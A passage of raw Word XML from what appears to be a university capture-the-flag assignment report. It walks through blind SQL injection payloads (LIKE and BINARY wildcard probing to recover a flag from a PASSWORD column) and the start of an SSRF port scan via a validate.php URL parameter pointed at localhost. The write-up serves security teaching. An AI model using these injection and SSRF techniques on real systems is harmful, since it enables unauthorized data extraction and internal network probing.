            <w:r w:rsidRPr="00FE19C5">
              <w:t>'+AND+PASSWORD+LIKE+'%'+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AAC7BB9" w14:textId="2CD9E1AF" w:rsidR="00EC2AD2" w:rsidRDefault="007E3FBA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:t>he website does not pop up “hacker detected”, Which means that there is a “PASSWORD” column in the database. So far, we have known that there are at least 3 columns in th</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> table: ID, PASSWORD, and USERNAME.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1FD3D3" w14:textId="0BCD59B9" w:rsidR="005C7E00" w:rsidRDefault="005C7E00" w:rsidP="00EC2AD2">
            <w:r>
              <w:t xml:space="preserve">With this information, if there is a flag, it can only be in column PASSWORD or USERNAME, as the </w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:t>length</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of ID</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:t>’s value</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is too short to store a flag.</w:t>
            </w:r>
            <w:r w:rsidR="00722387">
              <w:t xml:space="preserve"> With wildcard, we can figure out where the flag is saved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="7471EAF9" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7F7D1C" w14:textId="57506A45" w:rsidR="00EC2AD2" w:rsidRDefault="005C7E00" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07EF9F80" w14:textId="78307AA7" w:rsidR="00324D19" w:rsidRDefault="00FE19C5" w:rsidP="00EC2AD2">
            <w:r w:rsidRPr="00FE19C5">
              <w:t>FLAG%'+AND+PASSWORD+LIKE+'%</w:t>
            </w:r>
            <w:r w:rsidR="00324D19">
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B4DE68" w14:textId="77777777" w:rsidR="00722387" w:rsidRDefault="005C7E00" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72653FAB" wp14:editId="2C864D57">
                  <wp:extent cx="2040216" cy="97005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1510" cy="1056259"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC69C96" w14:textId="6EE5EC2D" w:rsidR="005C7E00" w:rsidRDefault="005C7E00" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:t>he flag is not in “username” column</w:t>
            </w:r>
            <w:r w:rsidR="00324D19">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="49DF6CD2" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51505368" w14:textId="5237337A" w:rsidR="00EC2AD2" w:rsidRDefault="005C7E00" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="119CADDA" w14:textId="68D0F49B" w:rsidR="00EC2AD2" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r w:rsidRPr="00722387">
              <w:t>%'+AND+PASSWORD+LIKE+'FLAG{%'+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B7E357" w14:textId="227C7DDB" w:rsidR="00722387" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF4F574" wp14:editId="2088428D">
                  <wp:extent cx="2153591" cy="97005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160" cy="999594"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C63B58" w14:textId="69C3E1AA" w:rsidR="005C7E00" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>With this information, we know one password contains “FLAG”. However, we cannot get this password directly, so we need to try one by one. Firstly, we need to know the length of this password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="1E3A9DA8" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B5E8391" w14:textId="3F719BDF" w:rsidR="00EC2AD2" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13EA0BE6" w14:textId="54F4B376" w:rsidR="00EC2AD2" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r w:rsidRPr="00722387">
              <w:t>%'+AND+PASSWORD+LIKE+</w:t>
            </w:r>
            <w:r w:rsidR="004C16E2">
              <w:t>BINARY+</w:t>
            </w:r>
            <w:r w:rsidRPr="00722387">
              <w:t>'FLAG</w:t>
            </w:r>
            <w:r>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00722387">
              <w:t>___________________________'+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61CD5A99" w14:textId="6258F057" w:rsidR="00EC2AD2" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09092E1F" wp14:editId="29EAAFE1">
                  <wp:extent cx="2168851" cy="10177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39641" cy="1050986"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FEFD72" w14:textId="64BD2B26" w:rsidR="000D5827" w:rsidRDefault="000D5827" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>ith BINARY, the query can be case sensitive.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D72F34" w14:textId="057596E3" w:rsidR="00722387" w:rsidRDefault="00722387" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">y adding the number of “_” behind </w:t>
            </w:r>
            <w:r w:rsidR="000D5827">
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:r w:rsidR="000D5827">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="004C16E2">
              <w:t xml:space="preserve"> until </w:t>
            </w:r>
            <w:r w:rsidR="000D5827">
              <w:t>website</w:t>
            </w:r>
            <w:r w:rsidR="004C16E2">
              <w:t xml:space="preserve"> displays User Found</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="004C16E2">
              <w:t xml:space="preserve"> there are 28 “_” in total, so we need to figure </w:t>
            </w:r>
            <w:r w:rsidR="00324D19">
              <w:t xml:space="preserve">out </w:t>
            </w:r>
            <w:r w:rsidR="004C16E2">
              <w:t>the 28 remaining characters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="486BC6F5" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49BEFF9C" w14:textId="6351F4BA" w:rsidR="00EC2AD2" w:rsidRDefault="004C16E2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4057F687" w14:textId="79758298" w:rsidR="005B022B" w:rsidRPr="005B022B" w:rsidRDefault="005B022B" w:rsidP="00A770D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Use my python script to figure out every characters of password containg flag. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F60EBBF" w14:textId="0FDAA4C4" w:rsidR="00C50149" w:rsidRDefault="00D347F7" w:rsidP="00FC2B1D">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D5827">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="000D5827">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ote</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>: The code</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> of script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> and output can be found in file SQLinScript.ipynb</w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> or behind this table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">. Before running the </w:t>
            </w:r>
            <w:r w:rsidR="005B022B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>, remember to replace the cookies parameters with your own</w:t>
            </w:r>
            <w:r w:rsidR="00FA09ED">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4912DF06" w14:textId="4F0528C6" w:rsidR="00770182" w:rsidRDefault="00FC2B1D" w:rsidP="00EC2AD2">
            <w:r>
              <w:t xml:space="preserve">The whole output can be found behind this table, and </w:t>
            </w:r>
            <w:r w:rsidR="00770182">
              <w:t xml:space="preserve">now we get the final flag: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0440E3B2" w14:textId="4E938F92" w:rsidR="00770182" w:rsidRDefault="00C50149" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF7A052" wp14:editId="6FCE19D1">
                  <wp:extent cx="2082165" cy="1676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2165" cy="167640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24F635AD" w14:textId="1475E72C" w:rsidR="005B022B" w:rsidRDefault="005B022B" w:rsidP="00EC2AD2"/>
    <w:p w14:paraId="0A3234BE" w14:textId="169E5E5C" w:rsidR="005B022B" w:rsidRDefault="00FC2B1D" w:rsidP="005B022B">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Script</w:t>
      </w:r>
      <w:r w:rsidR="005B022B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="005B022B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B022B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLinScript.ipynb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="452DE132" w14:textId="18C566C7" w:rsidR="005B022B" w:rsidRDefault="00FC2B1D" w:rsidP="005B022B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F0E280" wp14:editId="0DF8BC32">
            <wp:extent cx="5931316" cy="2748547"/>
            <wp:effectExtent l="0" t="0" r="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36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5952840" cy="2758521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804AE4B" w14:textId="2962C73E" w:rsidR="00FC2B1D" w:rsidRDefault="00FC2B1D" w:rsidP="00FC2B1D">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>utput of this script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC91D1" w14:textId="1CF642B0" w:rsidR="00FE41E0" w:rsidRPr="00FC2B1D" w:rsidRDefault="00FC2B1D" w:rsidP="00EC2AD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FCF45B" wp14:editId="4BDA9E43">
            <wp:extent cx="3466769" cy="3066757"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="32" name="图片 3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文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3472996" cy="3072266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD790B1" w14:textId="78DD535F" w:rsidR="00FE41E0" w:rsidRDefault="00FE41E0" w:rsidP="0088572A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc71488357"/>
      <w:bookmarkStart w:id="43" w:name="A2_s2"/>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r w:rsidR="00C10E9D">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> Exploitation Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5DD45E78" w14:textId="77777777" w:rsidR="002917EE" w:rsidRDefault="002917EE" w:rsidP="00FE41E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="9209" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="3544"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F43637" w14:paraId="7582FBD7" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:bookmarkEnd w:id="43"/>
          <w:p w14:paraId="4046BB4D" w14:textId="75DF101C" w:rsidR="00F43637" w:rsidRPr="008B0F50" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TEP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748C5894" w14:textId="513A525A" w:rsidR="00F43637" w:rsidRPr="008B0F50" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="472F1D47" w14:textId="51BAAFD6" w:rsidR="00F43637" w:rsidRPr="008B0F50" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="008B0F50">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>esult</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43637" w14:paraId="3F4B95C0" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D045926" w14:textId="0979E7EE" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ADCCBF6" w14:textId="198849C8" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00F43637">
            <w:r>
              <w:t>Open Burp Suite, and login. Visit the User Profile page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">). Input </w:t>
            </w:r>
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://localhost:8080</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> in website input box, click button “Validate Website”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778365DA" w14:textId="382B8F8B" w:rsidR="008B0F50" w:rsidRDefault="008B0F50" w:rsidP="008B0F50">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">In Burp Suite, we can find the response form </w:t>
            </w:r>
            <w:r w:rsidR="0020694D">
              <w:t xml:space="preserve">URL </w:t>
            </w:r>
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidR="0020694D" w:rsidRPr="008C435F">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/validate.php?web=http://localhost:8080</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD02CB9" w14:textId="77777777" w:rsidR="00F43637" w:rsidRDefault="008B0F50" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E49DE7E" wp14:editId="16635170">
                  <wp:extent cx="2577454" cy="22263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2336" cy="229105"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="33898F4F" w14:textId="1166900C" w:rsidR="008B0F50" w:rsidRDefault="008B0F50" w:rsidP="00EC2AD2">
            <w:r>
              <w:t xml:space="preserve">This step is </w:t>
            </w:r>
            <w:r w:rsidR="0020694D">
              <w:t xml:space="preserve">only </w:t>
            </w:r>
            <w:r>
              <w:t>used to confirm the reply message, you can replace 8080 with any number in the range of port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43637" w14:paraId="1E868C78" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BCCE9A" w14:textId="24C33C5A" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="534EBA58" w14:textId="356301C5" w:rsidR="00F43637" w:rsidRDefault="008B0F50" w:rsidP="00EC2AD2">
            <w:r>
              <w:t xml:space="preserve">Use the script </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SsrfScript.ipynb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to scan all ports, until we get a different response. (The content of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SsrfScript.ipynb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> can also be found after this table. Before use, remember to replace the value of cookies with your own).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DD8DEE" w14:textId="3EEF8E0D" w:rsidR="00F43637" w:rsidRDefault="008B0F50" w:rsidP="00EC2AD2">
            <w:r>
              <w:t xml:space="preserve">With the script, we know that port 8873’s response is different. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4F97FD" w14:textId="4E94E5C2" w:rsidR="008B0F50" w:rsidRDefault="008B0F50" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27FBAF71" wp14:editId="29687311">
                  <wp:extent cx="2970178" cy="112908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4489" cy="1134525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
